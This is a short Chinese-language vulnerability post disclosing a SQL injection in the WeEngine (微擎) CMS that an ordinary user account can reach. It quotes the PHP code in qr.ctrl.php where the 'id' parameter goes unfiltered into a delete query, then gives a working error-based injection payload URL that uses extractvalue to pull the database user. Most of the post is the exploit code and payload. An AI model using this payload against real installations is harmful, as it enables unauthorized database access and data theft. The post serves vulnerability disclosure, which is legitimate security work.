微擎普通用户权限SQL注入漏洞
没穿底裤发表于 2016-07-11 05:13:12
漏洞文件:web/source/platform/qr.ctrl.php
代码行:204左右
if($do == 'delsata') {
$id = $_GPC['id'];
$b = pdo_delete('qrcode_stat',array('id' =>$id, 'uniacid' => $_W['uniacid']));
if ($b){
message('删除成功',url('platform/qr/display'),'success');
}else{
message('删除失败',url('platform/qr/display'),'error');
}
}
$_GPC[‘id’]未过滤
构造payload:
http://localhost/we7/web/index.php ?c=platform &a=qr &do=delsata&id[0]=1\&id[1]=)/**/and/**/extractvalue(1,/**/concat(0x5c,/**/(select/**/user())))--+
demo测试
